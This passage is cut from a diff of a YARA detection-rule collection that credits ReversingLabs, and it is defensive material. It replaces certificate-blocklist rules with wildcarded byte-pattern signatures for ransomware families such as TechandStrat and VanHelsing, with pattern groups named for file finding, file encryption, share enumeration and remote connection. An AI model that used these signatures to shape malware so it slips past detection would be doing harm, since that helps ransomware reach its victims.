+            6A ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF
+            75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 85 ?? ?? ?? ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 8B CC 50 0F 84 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8D 4D ?? FF 73 ?? 53 E8 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            2B CE 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 43 ?? 46 8B 48 ?? 89 75 ?? 89 01 8B 45 ?? 83 F8
+            ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74
+            ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B CF 50 E8 ?? ?? ?? ?? 8B
+            45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 F6 0F 85 ??
+            ?? ?? ?? FF 75 ?? FF 15
+        }
+		$encrypt_files_p1 = {
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            45 ?? 83 7D ?? ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 45 ?? ??
+            ?? ?? ?? 6A ?? 50 66 89 45 ?? 8D 4D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F
+            43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 45 ?? FF 15 ?? ?? ??
+            ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B 4D ?? 01 0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 83 FA ?? 0F 8C ?? ??
+            ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 66 0F 1F 84 00
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85
+            FF 74 ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A
+        }
+		$encrypt_files_p2 = {
+            50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ??
+            8B 55 ?? 8B 4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85
+            ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ??
+            ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ??
+            ?? ?? 56 E9 ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ??
+            ?? ?? 72 ?? 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F
+            59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2
+            0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B
+            55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55
+            ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
+        }
+		$encrypt_files_p3 = {
+            E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ??
+            ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B
+            4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ??
+            57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B
+            55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9
+            ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 72 ??
+            81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B 4D
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
+        }
+		$encrypt_files_p4 = {
+            50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F
+            59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? E8 ??
+            ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 57 50 E8 ??
+            ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45
+            ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 53
+            FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 0F 1F 84 00 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F0 83 C4
+            ?? 85 F6 74 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66
+            0F 1F 84 00 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8
+            ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 56 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85 ??
+            ?? ?? ?? 57 56 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ??
+            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 50 6A ?? 53 FF 15 ?? ??
+            ?? ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ??
+            ?? 50 FF B6 ?? ?? ?? ?? 53 FF D7 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 6A ?? 6A
+            ?? 6A ?? FF 35 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 0F
+            84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ??
+            ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 8B 45 ?? 03 C0 50 E8 ??
+            ?? ?? ?? 8B F0 83 C4 ?? 80 3E ?? 74 ?? 8B 45 ?? 8B CE 85 C0 74 ?? 66 90 C6 01 ?? 8D
+            49 ?? 83 E8 ?? 75 ?? 8D 45 ?? 50 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF D7 6A ?? 8D 45 ?? 50 8B 45 ?? FF B0 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8B 45 ?? FF B0 ?? ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ??
+            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 6A ?? 50 FF 75 ?? FF
+            15
+        }
+		$remote_connection = {
+            FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 83 79 ?? ?? 72 ??
+            8B 09 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51 57 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85
+            F6 0F 84 ?? ?? ?? ?? 8B 4D ?? 53 83 79 ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? BB ?? ?? ?? ?? EB ?? 51 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BB
+            ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 8B C8 6A ?? E8 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ??
+            ?? 66 89 4D ?? 8D 4D ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8D 4D
+            ?? 83 E3 ?? E8 ?? ?? ?? ?? F6 C3 ?? 5B 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D
+            4D ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 0F
+            43 45 ?? 50 68 ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F
+            84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 3D ?? ??
+            ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 45 ??
+            85 C0 74 ?? C6 84 05 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ??
+            ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75 ?? 8B 7D
+            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45
+            ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D
+            ?? ?? 8D 4D ?? 8B 45 ?? 8D 55 ?? 0F 43 4D ?? 8B 75 ?? 03 C1 83 7D ?? ?? 8D 4D ?? 52
+            0F 43 4D ?? 50 51 8B CE E8 ?? ?? ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8D 4D
+            ?? E8
+        }
 
-rule REVERSINGLABS_Cert_Blocklist_0F9Fbdab9B39645Cf3211F87Abb5Ddb7 : INFO FILE
+	condition:
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and $remote_connection )
+}
+rule REVERSINGLABS_Win32_Ransomware_Techandstrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects TechandStrat ransomware."
 		author = "ReversingLabs"
-		id = "ad24d2e9-ae3d-5fae-b58d-965bd1de2a99"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "525d0b48-2018-5848-b9e7-def8395254eb"
+		date = "2021-05-17"
+		modified = "2021-05-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L567-L583"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.TechandStrat.yara#L1-L106"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ba5885c7769b5ead261815880033b0df50dc4f7684fdb37398ab01bfebda0e37"
+		logic_hash = "80e201cf91adeee100e05af3ba5227fc61968bb6e0ce602107ba1217a7a62856"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TechandStrat"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_shares_p1 = {
+            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? C7 45 ?? ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF
+            15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 75
+        }
+		$enum_shares_p2 = {
+            8D 46 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF 36 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B
+            7D ?? 72 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A
+            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
+            5D C2
+        }
+		$find_files = {
+            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 53 8B 5D ??
+            56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51
+            53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA ?? 75 ?? 8D 43 ?? 3B C8 74 ??
+            56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 80 FA ?? 74 ?? 80 FA ?? 74 ??
+            80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23
+            C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
+            ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57
+            57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D
+            ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ??
+            ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ??
+            ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75
+            ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B FF 56 57
+            8B F9 8B 37 EB ?? FF 36 E8 ?? ?? ?? ?? 59 83 C6 ?? 3B 77 ?? 75 ?? FF 37 E8 ?? ?? ??
+            ?? 59 5F 5E C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8B 75 ?? 8D 44 24 ?? 57 50 C6 44
+            24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8B
+            44 24 ?? 81 E9 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 D8 ?? 6A ?? 6A ?? 50 51 FF 36 FF D7
+            6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ??
+            81 BC 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33
+            D2 69 C0 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 8C 24 ?? ?? ?? ?? 83 C9 ?? 51 40 C7
+            44 24 ?? ?? ?? ?? ?? F7 F1 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 54 24 ?? 89 94
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ??
+            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 6A ?? 6A ?? 0F
+            11 84 24 ?? ?? ?? ?? 0F 57 C0 66 0F 13 44 24 ?? 8B 44 24 ?? 50 89 44 24 ?? 8B 44 24
+            ?? 50 FF 36 89 44 24 ?? FF D7 6A ?? 8D 44 24 ?? 0F 57 C0 50 68 ?? ?? ?? ?? 8D 84 24
+            ?? ?? ?? ?? 66 0F 13 44 24 ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85
+            C0 0F 84
+        }
+		$encrypt_files_p2 = {
+            6A ?? 6A ?? FF 74 24 ?? 0F 11 84 24 ?? ?? ?? ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ??
+            6A ?? 8D 44 24 ?? 50 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 8B C8 85 C0 B8 ?? ?? ?? ?? 6A ?? 0F 44 C8 69 44 24 ?? ?? ?? ?? ??
+            33 D2 6A ?? 40 89 44 24 ?? F7 F1 8B 4C 24 ?? 33 C0 83 C2 ?? 13 C0 01 54 24 ?? 13 C8
+            8B 44 24 ?? 89 4C 24 ?? 0F A4 C1 ?? C1 E0 ?? 51 50 FF 36 89 4C 24 ?? 89 44 24 ?? FF
+            15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF
+            15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? 6A ?? 6A ?? FF D7 8B 35 ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 89 44 24 ??
+            FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? FF D7 50 FF D6
+        }
+		$encrypt_files_p3 = {
+            6A ?? 6A ?? 66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ?? 6A ??
+            8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? C6 44
+            24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 80 7C 24 ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 83 C6 ??
+            56 FF 15 ?? ?? ?? ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            8B 75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "The Motivo Group, Inc." and pe.signatures [ i ] . serial == "0f:9f:bd:ab:9b:39:64:5c:f3:21:1f:87:ab:b5:dd:b7" and 1361318399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_shares_p* ) ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4211D2E4F0E87127319302C55B85Bcf2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Vanhelsing : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects VanHelsing ransomware."
 		author = "ReversingLabs"
-		id = "dbe2a945-cf13-564a-a95a-24534c70a723"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "a12c5a00-523b-5644-aac5-e0f9d7e779b5"
+		date = "2025-06-10"
+		modified = "2025-06-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L585-L601"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.VanHelsing.yara#L1-L464"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "edf9bbface7fe943dfa4f5a6e8469802ccdbd3de9d3e6b8fabebb024c21bb9a9"
+		logic_hash = "8a04dac3ede0d2fb63db8f97fc20bb83372a2adf5e760ea7c29e5f563cee7442"
 		score = 75
-		quality = 90
-		tags = "INFO, FILE"
+		quality = 88
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "VanHelsing"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_v1_p1 = {
